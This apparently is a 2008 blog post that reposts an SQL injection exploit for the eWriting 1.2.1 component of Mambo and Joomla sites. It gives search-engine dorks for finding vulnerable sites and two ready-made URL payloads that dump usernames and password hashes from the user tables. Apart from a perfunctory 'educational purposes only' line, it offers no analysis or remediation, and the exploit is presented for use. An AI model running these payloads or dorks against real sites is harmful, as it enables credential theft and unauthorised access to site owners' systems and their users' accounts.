Sunday, March 16, 2008

Mambo Component eWriting 1.2.1 (cat) SQL Injection

eWriting 1.2.1 - SQL injection


Dorks:

"Powered by eWriting 1.2.1
allinurl:"com_ewriting"

Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--

Mambo
/index.php?option=com_ewriting&Itemid=9999&func=sel ectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--

All credit goes to the original author

Source: http://hacking.isgreat.org/community/showthread.php?t=1015

Note: This is for educational purposes only, don't cause harm to anyone using this exploit

Enjoy!
Posted by at
Subscribe to: Post Comments (Atom)